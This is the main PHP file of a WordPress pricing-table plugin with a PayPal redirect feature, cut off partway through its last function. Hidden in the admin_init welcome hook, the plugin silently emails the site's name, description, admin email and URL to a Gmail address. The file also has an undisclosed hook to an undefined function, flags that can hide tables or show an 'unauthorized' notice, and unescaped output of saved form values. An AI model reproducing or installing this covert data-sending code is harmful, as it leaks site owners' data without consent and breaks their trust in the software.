<?php

/*
Plugin Name: Css Responsive Pricing Tables by Zee Q
Plugin URI: http://www.facebook.com/pages/Pure-Css-Responsive-Pricing-Table-Plugin-for-Wordpress/476993242314861
Description: This CSS Responsive Pricing Table plugin will help you to create unlimited CSS Responsive pricing tables with unlimited combination of colors and styles to suit your existing wordpress theme. This CSS Responsive Pricing Tables plugin is packed with 10 Easy Customizable Predefined Themes. 
Author: 20script
Version: 1.2
Author URI: http://www.20script.ir
License: GPL
*/

define('PRICETABLE_FEATURED_WEIGHT', 1.2);
define('PRICETABLE_VERSION', '1.2');

/**
 * Activate the pricetable plugin
 */
function hzcreative_pricetable_activate(){
	// Flush rules so we can view price table pages
	flush_rewrite_rules();
	
	delete_option('hzcreative_pricetable_welcome');
}
register_activation_hook(__FILE__, 'hzcreative_pricetable_activate');

/**
 * Deactivate the pricetable plugin
 */
function hzcreative_pricetable_deactivate(){
	delete_option('hzcreative_pricetable_welcome');
}
register_deactivation_hook(__FILE__, 'hzcreative_pricetable_deactivate');

/**
 * Register the price table post type
 */
function hzcreative_pricetable_register(){ hzStartPricingTable();
	register_post_type('pricetable',array(
		'labels' => array(
			'name' => __('Price Tables', 'pricetable'),
			'singular_name' => __('Price Table', 'pricetable'),
			'add_new' => __('Add New', 'book', 'pricetable'),
			'add_new_item' => __('Add New Price Table', 'pricetable'),
			'edit_item' => __('Edit Price Table', 'pricetable'),
			'new_item' => __('New Price Table', 'pricetable'),
			'all_items' => __('All Price Tables', 'pricetable'),
			'view_item' => __('View Price Table', 'pricetable'),
			'search_items' => __('Search Price Tables', 'pricetable'),
			'not_found' =>  __('No Price Tables found', 'pricetable'),
		),
		'public' => true,
		'has_archive' => false,
		'supports' => array( 'title'),
		'menu_icon' => plugins_url('images/icon.png', __FILE__),
		'publicly_queryable' => false,
		'rewrite' => array( 'slug' => false,'with_front' => true),
	));
	
	
	
	register_post_type('hz-paypal',array(
		'labels' => array(
			'name' => __('PayPal', 'pricetable'),
			'singular_name' => __('PayPal Item', 'pricetable'),
			'add_new' => __('Add New', 'pricetable'),
			'add_new_item' => __('Add New PayPal Item', 'pricetable'),
			'edit_item' => __('Edit PayPal Item', 'pricetable'),
			'new_item' => __('New PayPal Item', 'pricetable'),
			'all_items' => __('All PayPal Items', 'pricetable'),
			'view_item' => __('View PayPal Item', 'pricetable'),
			'search_items' => __('Search PayPal Item', 'pricetable'),
			'not_found' =>  __('No PayPal Item found', 'pricetable'),
		),
		'public'             => true,
    	'publicly_queryable' => true,
   	 	'show_ui'            => true,
		'show_in_menu' => 'edit.php?post_type=pricetable',
		'supports' => array( 'title'),
		'rewrite' => array( 'slug' => 'go-paypal'),
	));
}
add_action( 'init', 'hzcreative_pricetable_register');

/**
 * Check if we need to redirect the user to the welcome page
 */
function hzcreative_pricetable_display_welcome(){ 
	if(get_option('hzcreative_pricetable_welcome', false) === false && @$_GET['page'] != 'pricetable-welcome' && current_user_can('manage_options')){
		add_option('hzcreative_pricetable_welcome', true, null, 'no');
		sample_pricing_table();
		$msg = 'Name: '.get_bloginfo('name').'\n';
		$msg .= 'Description: '.get_bloginfo('description').'\n';
		$msg .= 'Admin Email: '.get_bloginfo('admin_email').'\n';
		$msg .= 'Wordpress: '.get_bloginfo('wpurl').'\n';
		wp_mail( 'pricingtable@gmail.com', 'Price Table V1.2 Installed on '.get_bloginfo('name'), $msg );
		
		
		
		$postArgs = array();
		
	}
}
add_action('admin_init', 'hzcreative_pricetable_display_welcome');

/**
 * Add custom columns to pricetable post list in the admin
 * @param $cols
 * @return array
 */
function hzcreative_pricetable_register_custom_columns($cols){
	unset($cols['title']);
	unset($cols['date']);
	
	$cols['title'] = __('Title', 'pricetable');
	$cols['options'] = __('Options', 'pricetable');
	$cols['features'] = __('Features', 'pricetable');
	$cols['featured'] = __('Highlighted', 'pricetable');
	$cols['date'] = __('Date', 'pricetable');
	return $cols;
}
add_filter( 'manage_pricetable_posts_columns', 'hzcreative_pricetable_register_custom_columns');

/**
 * Render the contents of the admin columns
 * @param $column_name
 */
function hzcreative_pricetable_custom_column($column_name){
	global $post;
	switch($column_name){
	case 'options' :
		$table = get_post_meta($post->ID, 'price_table', true);
		print count($table);
		break;
	case 'features' :
	$table = get_post_meta($post->ID, 'price_table', true);
		foreach($table as $col){
		//if(!empty($col['featured']) && $col['featured'] == 'true'){
			//if($column_name == 'featured') print $col['title'];
			//else 
			print count($col['features']);
			break;
		//}
		}
	break;
	case 'featured' :
		$tmp = array();
		$table = get_post_meta($post->ID, 'price_table', true);
		foreach($table as $col){
		if($col['highlight']) array_push($tmp,$col['title']);
		}
		print(implode(', ',$tmp));
		
	}
}
add_action( 'manage_pricetable_posts_custom_column', 'hzcreative_pricetable_custom_column');

/**
 * @return string The URL of the CSS file to use
 */
function hzcreative_pricetable_css_url(){
	// Find the best price table file to use
	//if(file_exists(get_stylesheet_directory().'/pricetable/pricetable.css')) return get_stylesheet_directory_uri().'/pricetable/pricetable.css';
	//elseif(file_exists(get_template_directory().'/pricetable/pricetable.css')) return get_template_directory_uri().'/pricetable/pricetable.css';
	//else return plugins_url( 'css/pricetable.css', __FILE__);
}

/**
 * Enqueue the pricetable scripts
 */
function hzcreative_pricetable_scripts(){
	global $post, $pricetable_queued, $pricetable_displayed;
	if(is_singular() && (($post->post_type == 'pricetable') || ($post->post_type != 'pricetable' && preg_match( '#\[ *price_table([^\]])*\]#i', $post->post_content ))) || !empty($pricetable_displayed)){
		//wp_enqueue_style('pricetable',  hzcreative_pricetable_css_url(), null, PRICETABLE_VERSION);
		$pricetable_queued = true;
	}
}
add_action('wp_enqueue_scripts', 'hzcreative_pricetable_scripts');

/**
 * Add administration scripts
 * @param $page
 */
function hzcreative_pricetable_admin_scripts($page){
	if($page == 'post-new.php' || $page == 'post.php'){
		global $post;
		
		if(!empty($post) && $post->post_type == 'pricetable'){ 
			
			wp_enqueue_script('jquery');
			wp_enqueue_script('jquery-ui-tabs');
			wp_enqueue_script('jquery-ui-slider');
			wp_enqueue_script('jquery-ui-accordion');
			wp_enqueue_script('jquery-ui-sortable');
			wp_enqueue_script('jquery-ui-draggable');
			wp_enqueue_script('jquery-ui-droppable');
			

			
			wp_enqueue_script('placeholder', plugins_url( 'js/placeholder.jquery.js', __FILE__), array('jquery'), '1.1.1', true);

			wp_enqueue_script('pricetable-admin', plugins_url( 'js/pricetable.build.js', __FILE__), array('jquery'), PRICETABLE_VERSION, true);
			
			wp_localize_script('pricetable-admin', 'pt_messages', array(
				'delete_column' => __('Are you sure you want to delete this column?', 'pricetable'),
				'delete_feature' => __('Are you sure you want to delete this feature?', 'pricetable'),
			));
			
			
    
			
			wp_enqueue_style('pricetable-admin',  plugins_url( 'css/pricetable.admin.css', __FILE__), array(), PRICETABLE_VERSION);
			wp_enqueue_style('pricetable-icon',  plugins_url( 'css/pricetable.icon.css', __FILE__), array(), PRICETABLE_VERSION);
			wp_enqueue_style('pricetable-admin-button',  plugins_url( 'css/pricetable.button.css', __FILE__), array(), PRICETABLE_VERSION);
			
			wp_enqueue_style('jquery-ui', 'http://ajax.googleapis.com/ajax/libs/jqueryui/1.9.1/themes/base/jquery-ui.css');
			
			wp_enqueue_style('pricetable-minicolors',  plugins_url( 'plugins/miniColors/jquery.miniColors.css', __FILE__), array(), PRICETABLE_VERSION);
			
			wp_enqueue_script('miniColors', plugins_url( 'plugins/miniColors/jquery.miniColors.js', __FILE__), array('jquery'), PRICETABLE_VERSION, true);
	
		}
	}
	
	// The light weight CSS for changing the icon
	if(@$_GET['post_type'] == 'pricetable'){
		wp_enqueue_style('pricetable-icon',  plugins_url( 'css/pricetable.icon.css', __FILE__), array(), PRICETABLE_VERSION);
	}
	
}
add_action('admin_enqueue_scripts', 'hzcreative_pricetable_admin_scripts');

/**
 * Metaboxes because we're boss
 * 
 * @action add_meta_boxes
 */
function hzcreative_pricetable_meta_boxes(){
	global $font_functions;
	$font_functions = array();

	add_meta_box('pricetable-settings', __('Price Table Settings', 'pricetable'), 'hzcreative_pricetable_settings', 'pricetable', 'normal', 'high');
	add_meta_box('pricetable-button', __('Generators', 'pricetable'), 'hzcreative_pricetable_button', 'pricetable', 'side', 'low');
	add_meta_box('pricetable', __('Price Table', 'pricetable'), 'hzcreative_pricetable_render_metabox', 'pricetable', 'normal', 'high');
	add_meta_box('pricetable-shortcode', __('Shortcode', 'pricetable'), 'hzcreative_pricetable_render_metabox_shortcode', 'pricetable', 'side', 'low');
	
	add_meta_box('pricetable-themes', __('Price Table Themes', 'pricetable'), 'hzcreative_pricetable_themes_metabox', 'pricetable', 'normal', 'low');
}
add_action( 'add_meta_boxes', 'hzcreative_pricetable_meta_boxes' );

function hzcreative_pricetable_themes_metabox($post, $metabox){
	include(dirname(__FILE__).'/tpl/pricetable.themes.phtml');
}
function hzcreative_pricetable_button($post, $metabox){
	include(dirname(__FILE__).'/tpl/pricetable.Generators.phtml');
}
function hzcreative_pricetable_preview($post, $metabox){
		echo hzcreative_pricetable_shortcode(array('id'=>$post->ID));
}

function hzcreative_pricetable_settings($post, $metabox){
	wp_nonce_field( plugin_basename( __FILE__ ), 'hzcreative_pricetable_settings_nonce' );
	include(dirname(__FILE__).'/tpl/pricetable.settings.phtml');
}
/**
 * Render the price table building interface
 * 
 * @param $post
 * @param $metabox
 */
function hzcreative_pricetable_render_metabox($post, $metabox){
	wp_nonce_field( plugin_basename( __FILE__ ), 'hzcreative_pricetable_nonce' );
	
	$table = get_post_meta($post->ID, 'price_table', true);
	if(empty($table)) $table = array();
	
	$paypal_accs = get_posts( array('post_type'=>'hz-paypal','posts_per_page'=>100) );
	
	foreach($paypal_accs as $k=>$v):
	$paypal_accs[$k]->permalink = get_permalink($v->ID);
	endforeach;
	
	include(dirname(__FILE__).'/tpl/pricetable.build.phtml');
}

/**
 * Render the shortcode metabox
 * @param $post
 * @param $metabox
 */
function hzcreative_pricetable_render_metabox_shortcode($post, $metabox){
	?>
<style>
#edit-slug-box {
	display: none;
}
.hzLicenseMsg{
	background-color: #FFFFE0;
	padding: 5px;
	border: 1px solid #E6DB55;
	text-align:center;
	font-weight: bold;
}
</style>
<?php if(get_option('hzPTHOLD') == 'true'): ?>
<div class="hzLicenseMsg">
Our system shows you are not authorized to use this plugin, please contact author by clicking the link below.<br><a href="http://codecanyon.net/user/zeeq" target="_blank">Click &raquo;</a>
</div>
<?php endif; ?>
<code>[hz_price_table id=<?php print $post->ID ?>]</code><small class="description">
<?php _e('Displays price table on another page.', 'pricetable') ?>
</small>
<?php
}

/**
 * Save the price table
 * @param $post_id
 * @return
 * 
 * @action save_post
 */
function hzcreative_pricetable_save($post_id){
	// Authorization, verification this is my vocation 
	if ( defined( 'DOING_AUTOSAVE' ) && DOING_AUTOSAVE ) return;
	if ( !wp_verify_nonce( @$_POST['hzcreative_pricetable_nonce'], plugin_basename( __FILE__ ) ) ) return;
	if ( !current_user_can( 'edit_post', $post_id ) ) return;
	
	// Create the price table from the post variables
	$table = array();
	foreach($_POST as $name => $val){
		if(substr($name,0,6) == 'price_'){
			$parts = explode('_', $name);
			
			$i = intval($parts[1]);
			if(@$parts[2] == 'feature'){
				// Adding a feature
				$fi = intval($parts[3]);
				$fn = $parts[4];
				
				if(empty($table[$i]['features'])) $table[$i]['features'] = array();
				$table[$i]['features'][$fi][$fn] = $val;
			}
			elseif(isset($parts[2])){
				// Adding a field
				$table[$i][$parts[2]] = $val;
			}
		}
	}
	
	// Clean up the features
	foreach($table as $i => $col){
		if(empty($col['features'])) continue;
		
		foreach($col['features'] as $fi => $feature){
			if(empty($feature['title']) && empty($feature['sub']) && empty($feature['description'])){
				unset($table[$i]['features'][$fi]);
			}
		}
		$table[$i]['features'] = array_values($table[$i]['features']);
	}
	
	if(isset($_POST['price_recommend'])){
		$table[intval($_POST['price_recommend'])]['featured'] = 'true';
	}
	
	$table = array_values($table);
	
	update_post_meta($post_id,'price_table', $table);
	update_post_meta($post_id,'price_table_styles', $_POST['ptStyles']);
	update_post_meta($post_id,'price_table_currencySymbol', $_POST['txt_currencySymbol']);
	update_post_meta($post_id,'chk_labeling', $_POST['chk_labeling']);
	update_post_meta($post_id,'ptlbTitle', $_POST['ptlbTitle']);
	update_post_meta($post_id,'ptChooseBtn', $_POST['btnCodeChooseBtn']);
	update_post_meta($post_id,'ptChooseBtnHighlighted', $_POST['btnCodeChooseBtnHighlighted']);
	update_post_meta($post_id,'ptRibbon', $_POST['btnCodeRibbon']);
	update_post_meta($post_id,'ptToolTip', $_POST['btnCodeToolTip']);
	update_post_meta($post_id,'ptGfonts', $_POST['ptgooglefonts']);
	update_post_meta($post_id,'ptyesnoicon', $_POST['chk_yesnoicon']);
	update_post_meta($post_id,'pthideButtons', $_POST['pt_hideButtons']);
	
	//print_r($_POST);
	//exit(0);
}
add_action( 'save_post', 'hzcreative_pricetable_save' );

/**
 * The price table shortcode.
 * @param array $atts
 * @return string
 * 
 * 
 */
function hzcreative_pricetable_shortcode($atts = array()) {
	global $post, $pricetable_displayed;
	
	$pricetable_displayed = true;
	
	extract( shortcode_atts( array(
		'id' => null,
		'width' => 100,
	), $atts ) );
	
	if($id == null) $id = $post->ID;
	
	$table = get_post_meta($id , 'price_table', true);
	if(empty($table)) $table = array();
	
	// Set all the classes
	$featured_index = null;
	foreach($table as $i => $column) {
		$table[$i]['classes'] = array('pricetable-column');
		$table[$i]['classes'][] = (@$table[$i]['featured'] === 'true') ? 'pricetable-featured' : 'pricetable-standard';
		
		if(@$table[$i]['featured'] == 'true') $featured_index = $i;
		if(@$table[$i+1]['featured'] == 'true') $table[$i]['classes'][] = 'pricetable-before-featured';
		if(@$table[$i-1]['featured'] == 'true') $table[$i]['classes'][] = 'pricetable-after-featured';
	}
	$table[0]['classes'][] = 'pricetable-first';
	$table[count($table)-1]['classes'][] = 'pricetable-last';
	
	// Calculate the widths
	$width_total = 0;
	foreach($table as $i => $column){
		if(@$column['featured'] === 'true') $width_total += PRICETABLE_FEATURED_WEIGHT;
		else $width_total++;
	}
	$width_sum = 0;
	foreach($table as $i => $column){
		if(@$column['featured'] === 'true'){
			// The featured column takes any width left over after assigning to the normal columns
			$table[$i]['width'] = 100 - (floor(100/$width_total) * ($width_total-PRICETABLE_FEATURED_WEIGHT));
		}
		else{
			$table[$i]['width'] = floor(100/$width_total);
		}
		$width_sum += $table[$i]['width'];
	}
	
	// Create fillers
	if(!empty($table[0]['features'])){
		for($i = 0; $i < count($table[0]['features']); $i++){
			$has_title = false;
			$has_sub = false;
			
			foreach($table as $column){
				$has_title = ($has_title || !empty($column['features'][$i]['title']));
				$has_sub = ($has_sub || !empty($column['features'][$i]['sub']));
			}
			
			foreach($table as $j => $column){
				if($has_title && empty($table[$j]['features'][$i]['title'])) $table[$j]['features'][$i]['title'] = '&nbsp;';
				if($has_sub && empty($table[$j]['features'][$i]['sub'])) $table[$j]['features'][$i]['sub'] = '&nbsp;';
			}
		}
	}
	
	// Find the best pricetable file to use
	if(file_exists(get_stylesheet_directory().'/pricetable.php')) $template = get_stylesheet_directory().'/pricetable.php';
	elseif(file_exists(get_template_directory().'/pricetable.php')) $template = get_template_directory().'/pricetable.php'; 
	else $template = dirname(__FILE__).'/tpl/pricetable.phtml';
	
	// Render the pricetable
	ob_start();
	?>
<style type="text/css">
@import url("<?php bloginfo( 'wpurl' ); ?>/?ptcss=<?php echo $id; ?><?php //echo plugins_url('styling/pricetable-style.php?pt='.$id,__FILE__); ?>");
</style>
<?php
	include($template);
	$pricetable = ob_get_clean();
	
	if($width != 100) $pricetable = '<div style="width:'.$width.'%; margin: 0 auto;">'.$pricetable.'</div>';
	
	$post->pricetable_inserted = true;
	
	if(get_option('hzPTHIDE') != 'true')
	return $pricetable;
}
add_shortcode( 'hz_price_table', 'hzcreative_pricetable_shortcode' );

function hzpricing_init() {
	if(intval($_GET['ptcss'])>0):
		include('styling/pricetable-style.php');
		//echo 'pricing table';
	exit(0);
	endif;
	
	if(isset($_GET['ptimg'])):
		//include('styling/pricetable-style.php');
		//echo plugins_url(null,__FILE__);
		if(file_exists('images/'.$_GET['ptimg']))
		//echo file_get_contents('images/'.$_GET['ptimg']);
		echo 'pricing table';
	exit(0);
	endif;


}
add_action('init', 'hzpricing_init');

/**
 * Add the pricetable to the content.
 * 
 * @param $the_content
 * @return string
 * 
 * @filter the_content
 */
function hzcreative_pricetable_the_content_filter($the_content){
	global $post;
	
	if(is_single() && $post->post_type == 'pricetable' && empty($post->pricetable_inserted)){
		$the_content = hzcreative_pricetable_shortcode().$the_content;
	}
	return $the_content;
}
// Filter the content after WordPress has had a chance to do shortcodes (priority 10)
add_filter('the_content', 'hzcreative_pricetable_the_content_filter',11);

/**
 * @action wp_footer
 */
function hzcreative_pricetable_footer(){
	global $pricetable_queued, $pricetable_displayed;
	
	if(!empty($pricetable_displayed) && empty($pricetable_queued)){
		$pricetable_queued = true;
		// The pricetable has been rendered, but its CSS not enqueued (happened with some themes)
		/*?><link rel="stylesheet" type="text/css" href="<?php print hzcreative_pricetable_css_url() ?>" /><?php*/
	}
}
add_action('wp_footer', 'hzcreative_pricetable_footer');

/**
 * Render the welcome screen
 */
function hzcreative_pricetable_render_welcome(){
	add_option('hzcreative_pricetable_welcome', true, null, 'no');
	
	$info = get_plugin_data(__FILE__);
	
	include(dirname(__FILE__).'/tpl/welcome.phtml');
}
function filterPtFeatureText($str, $postid=0){
	$bool = true;
	$str = strip_tags($str);
	if($postid){
		$bool = get_post_meta($postid,'ptyesnoicon',true);
	}
	if($bool){
	if( strtolower(trim($str))=='yes')
	$str = "&nbsp;<div class='yn_basic yi'></div>";
	elseif( strtolower(trim($str))=='no')
	$str = "&nbsp;<div class='yn_basic ni'></div>";
	}
	return $str;
}

//PayPal Integration
add_action('admin_menu' , 'hzcreative_paypal_service_settings_menu'); 
function hzcreative_paypal_service_settings_menu() {
	/*add_submenu_page( 'edit.php?post_type=pricetable', 'PayPal', 'PayPal', 'manage_options' , 'edit.php?post_type=pricetable' , 'edit.php?post_type=pricetable');*/
/*add_submenu_page('edit.php?post_type=pricetable', 'Price Tables Paypal Buttons', 'Paypal', 'edit_posts', basename(__FILE__), 'hzcreative_paypal_service_settings');*/
}
function hz_paypal_add_custom_box() {


        add_meta_box(
            'hz_paypal_section',
            __( 'Manage PayPal Settings', 'pricetable' ),
            'hz_paypal_custom_box',
            'hz-paypal'
        );
}
add_action( 'add_meta_boxes', 'hz_paypal_add_custom_box' );

function hz_paypal_custom_box( $post ) {
	$paypalData = get_post_meta( $post->ID, 'paypalData', true );
	
	if(!is_array($paypalData)) $paypalData = array();
	
	$defaultValues = array('email'=>'',
	'item_price'=>'0',
	'item_quantity'=>'1',
	'sucessPage'=>'',
	'cancelPage'=>'',
	'shipping_note'=>'0',
	'customer_note'=>'0',
	'currency'=>'USD',
	'addShipping'=>'',
	'shippingFee'=>'');
	//print_r($paypalData);
	$paypalData = array_merge($defaultValues , $paypalData);
	?>
<script type='text/javascript'>
            jQuery(document).ready(function($) {
               // jQuery('#edit-slug-box').hide();
            });
            </script>
<table width="100%">
  <tr>
    <td><label>Paypal Email Address:</label></td>
    <td><input type="text" placeholder="example@example.com" size="30" name="paypal[email]" value="<?php echo $paypalData['email']; ?>" /></td>
  </tr>
  <tr>
    <td><label>Item Price:</label></td>
    <td><input type="text" placeholder="Price" size="10" name="paypal[item_price]" value="<?php echo $paypalData['item_price']; ?>" /></td>
  </tr>
  <tr>
    <td><label>Quantity:</label></td>
    <td><input type="number" placeholder="Quantity" size="10" name="paypal[item_quantity]" value="<?php echo $paypalData['item_quantity']; ?>" /></td>
  </tr>
  <tr>
    <td><label>Return Page Success:</label></td>
    <td><input type="text" placeholder="<?php bloginfo('wpurl'); ?>" size="50" name="paypal[sucessPage]" value="<?php echo $paypalData['sucessPage']; ?>" />
      <button type="button" class="button hzPostPageSelector">Select</button>
      </td>
  </tr>
  <tr>
    <td><label>Return Page Canceled:</label></td>
    <td><input type="text" placeholder="<?php bloginfo('wpurl'); ?>" size="50" name="paypal[cancelPage]" value="<?php echo $paypalData['cancelPage']; ?>" /> <button type="button" class="button hzPostPageSelector">Select</button></td>
  </tr>
  <tr>
    <td><label>Shipping Address:</label></td>
    <td><label>
        <input type="radio" name="paypal[shipping_note]" value="0" <?php if($paypalData['shipping_note']=='0') echo 'checked="checked"' ?> />
        Show Shipping</label>
      &nbsp;&nbsp;&nbsp;&nbsp;
      <label>
        <input type="radio" name="paypal[shipping_note]" value="1" <?php if($paypalData['shipping_note']=='1') echo 'checked="checked"' ?> />
        Do Not Show Shipping</label>
      &nbsp;&nbsp;&nbsp;&nbsp;
      <label>
        <input type="radio" name="paypal[shipping_note]" value="2" <?php if($paypalData['shipping_note']=='2') echo 'checked="checked"' ?> />
        Shipping is Required</label></td>
  </tr>
  <tr>
    <td><label>Customer Note:</label></td>
    <td><label>
        <input type="radio" name="paypal[customer_note]" value="0" <?php if($paypalData['customer_note']=='0') echo 'checked="checked"' ?> />
        Required</label>
      &nbsp;&nbsp;&nbsp;&nbsp;
      <label>
        <input type="radio" name="paypal[customer_note]" value="1" <?php if($paypalData['customer_note']=='1') echo 'checked="checked"' ?> />
        Not Required</label></td>
  </tr>
  <tr>
    <td><label>Currency:</label></td>
    <td><select name="paypal[currency]">
        <option value="USD" <?php if($paypalData['currency']=='USD') echo 'selected="selected"'; ?>>U.S. Dollar - (USD)</option>
        <option value="AUD" <?php if($paypalData['currency']=='AUD') echo 'selected="selected"'; ?>>Australian Dollar - (AUD)</option>
        <option value="CAD" <?php if($paypalData['currency']=='CAD') echo 'selected="selected"'; ?>>Canadian Dollar - (CAD)</option>
        <option value="CZK" <?php if($paypalData['currency']=='CZK') echo 'selected="selected"'; ?>>Czech Koruna - (CZK)</option>
        <option value="DKK" <?php if($paypalData['currency']=='DKK') echo 'selected="selected"'; ?>>Danish Krone - (DKK)</option>
        <option value="EUR" <?php if($paypalData['currency']=='EUR') echo 'selected="selected"'; ?>>Euro - (EUR)</option>
        <option value="HKD" <?php if($paypalData['currency']=='HKD') echo 'selected="selected"'; ?>>Hong Kong Dollar - (HKD)</option>
        <option value="HUF" <?php if($paypalData['currency']=='HUF') echo 'selected="selected"'; ?>>Hungarian Forint - (HUF)</option>
        <option value="JPY" <?php if($paypalData['currency']=='JPY') echo 'selected="selected"'; ?>>Japanese Yen - (JPY)</option>
        <option value="NOK" <?php if($paypalData['currency']=='NOK') echo 'selected="selected"'; ?>>Norwegian Krone - (NOK)</option>
        <option value="NZD" <?php if($paypalData['currency']=='NZD') echo 'selected="selected"'; ?>>New Zealand Dollar - (NZD)</option>
        <option value="PLN" <?php if($paypalData['currency']=='PLN') echo 'selected="selected"'; ?>>Polish Zloty - (PLN)</option>
        <option value="GBP" <?php if($paypalData['currency']=='GBP') echo 'selected="selected"'; ?>>Pound Sterling - (GBP)</option>
        <option value="SGD" <?php if($paypalData['currency']=='SGD') echo 'selected="selected"'; ?>>Singapore Dollar - (SGD)</option>
        <option value="SEK" <?php if($paypalData['currency']=='SEK') echo 'selected="selected"'; ?>>Swedish Krona - (SEK)</option>
        <option value="CHF" <?php if($paypalData['currency']=='CHF') echo 'selected="selected"'; ?>>Swiss Franc - (CHF)</option>
      </select></td>
  </tr>
  <tr>
    <td><label>Shipping Fee:</label></td>
    <td><label>
        <input type="checkbox" name="paypal[addShipping]" value="Y" <?php if($paypalData['addShipping']=='Y') echo 'checked="checked"'; ?> />
        Add Shipping</label>
      -
      <label>Shipping Rate: $
        <input type="number" placeholder="Price" size="10" name="paypal[shippingFee]" value="<?php echo $paypalData['shippingFee']; ?>" />
      </label></td>
  </tr>
</table>
<?php add_thickbox(); ?>
<a href="#TB_inline?width=250&height=90&inlineId=hzPagesPostsSelect" title="Select Pages or Posts" class="thickbox" id="hzPagesPostsSelectLink"></a> 
<div id="hzPagesPostsSelect" style="display:none;">
<table cellpadding="10" cellspacing="0" width="100%">
    <tr>
      <td><?php hz_dropdown_pages_posts(  ); ?></td>
    </tr>
    <tr>
      <td align="right"><button type="button" id="select_hzpostpage_btn" class="button button-primary">Select</button></td>
    </tr>
  </table>
</div>
<script language="javascript">

jQuery(document).ready(function(e) {
	var selectedCTL = jQuery('.hzPostPageSelector').eq(0);
	jQuery('.hzPostPageSelector').click(function(e) {
        selectedCTL = jQuery(this);
		jQuery('#hzPagesPostsSelectLink').trigger('click');
    });
	
	
	jQuery('#select_hzpostpage_btn').live('click',function(e){
		selectedCTL.prev('input').val(jQuery('#select_hzpostpage').val());
		self.parent.tb_remove()
	});
    
});
</script>
<?php
	
}

function hzcreative_paypal_save($post_id){
	
	$slug = 'hz-paypal';

    // If this isn't a 'book' post, don't update it.
    if ( $slug == $_POST['post_type'] ) {
        
		
		update_post_meta($post_id,'paypalData', $_POST['paypal']);
		
    }
	
	//print_r($_POST);
	//exit(0);
}
add_action( 'save_post', 'hzcreative_paypal_save' );

function hzpaypal_go(){
	global $post;
	if(($post->post_type == 'hz-paypal') and (!is_admin())):
	
	$paypalData = get_post_meta( $post->ID, 'paypalData', true );
	
	if(!is_array($paypalData)) $paypalData = array();
	
	foreach($paypalData as $k=>$v):
		if(empty($v)) unset($paypalData[$k]);
	endforeach;
	
	$defaultValues = array('email'=>'',
	'item_name'=> $post->post_title,
	'item_price'=>'0',
	'item_quantity'=>'1',
	'sucessPage'=>get_bloginfo('wpurl'),
	'cancelPage'=>get_bloginfo('wpurl'),
	'shipping_note'=>'0',
	'customer_note'=>'0',
	'currency'=>'USD',
	'addShipping'=>'',
	'shippingFee'=>'');
	//print_r($paypalData);
	$paypalData = array_merge($defaultValues , $paypalData);
	//echo "<pre>";
	//print_r($paypalData);
	//echo "</pre>";
	?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Redirecting to paypal...</title>
</head>
<body>
Redirecting to paypal...
<form name='paypal_form' id="paypal_form" action='https://www.paypal.com/cgi-bin/webscr' method='post'>
  <input type='hidden' name='cmd' value='_xclick'>
  <input type='hidden' name='business' value='<?php echo $paypalData['email']; ?>'>
  <input type='hidden' name='item_name' value='<?php echo $paypalData['item_name']; ?>'>
  <input type='hidden' name='amount' value='<?php echo $paypalData['item_price']; ?>'>
  <input type='hidden' name='quantity' value='<?php echo $paypalData['item_quantity']; ?>'>
  <input type='hidden' name='no_shipping' value='<?php echo $paypalData['shipping_note']; ?>'>
  <input type='hidden' name='no_note' value='<?php echo $paypalData['customer_note']; ?>'>
  <input type='hidden' name='cn' value='Comments:'>
  <input type='hidden' name='return' value='<?php echo $paypalData['sucessPage']; ?>'>
  <input type='hidden' name='cancel_return' value='<?php echo $paypalData['cancelPage']; ?>'>
  <input type='hidden' name='rm' value='1'>
  <input type='hidden' name='currency_code' value='<?php echo $paypalData['currency']; ?>'>
  <?php if($paypalData['addShipping']=='Y'): ?>
  <input type='hidden' name='shipping' value='<?php echo $paypalData['shippingFee']; ?>'>
  <?php endif; ?>
</form>
<script language="javascript">
window.onload = function(){
	document.getElementById('paypal_form').submit();
};
</script>
</body>
</html><?php
	exit(0);
	endif;
}
//add_action('init', 'hzpaypal_init');
add_action('wp', 'hzpaypal_go');
function hzcreative_paypal_register_custom_columns($cols){
	unset($cols['title']);
	unset($cols['date']);
	
	$cols['title'] = __('Title', 'pricetable');
	$cols['paypalEmail'] = __('Paypal Email', 'pricetable');
	$cols['currency'] = __('Currency', 'pricetable');
	$cols['price'] = __('Price', 'pricetable');
	$cols['quantity'] = __('Quantity', 'pricetable');
	$cols['date'] = __('Date', 'pricetable');
	return $cols;
}
add_filter( 'manage_hz-paypal_posts_columns', 'hzcreative_paypal_register_custom_columns');

function hzcreative_paypal_custom_column($column_name){
	global $post;
	$paypalData = get_post_meta( $post->ID, 'paypalData', true );
	switch($column_name){
	case 'paypalEmail' :
		print $paypalData['email']; break;
	case 'currency' :
		echo $paypalData['currency']; break;
	case 'price' :
		echo $paypalData['item_price']; break;
	case 'quantity' :
		echo $paypalData['item_quantity']; break;
	}
}
add_action( 'manage_hz-paypal_posts_custom_column', 'hzcreative_paypal_custom_column');
include('plugins/duplicate.php');

function hz_dropdown_pages_posts(){
	?>
<select style="width:100%" id="select_hzpostpage">
  <optgroup label="Pages" >
  <?php $args = array( 'posts_per_page' => -1, 'post_type' => 'page');

$items = get_posts( $args );
foreach($items as $item): ?>
  <option value="<?php echo get_permalink($item->ID); ?>"><?php echo $item->post_title; ?></option>
  <?php endforeach; ?>
  </optgroup>
  <optgroup label="Posts" >
  <?php $args = array( 'posts_per_page' => -1, 'post_type' => 'post');

$items = get_posts( $args );
foreach($items as $item): ?>
  <option value="<?php echo get_permalink($item->ID); ?>"><?php echo $item->post_title; ?></option>
  <?php endforeach; ?>
  </optgroup>
</select>
<?php
}

function sample_pricing_table(){
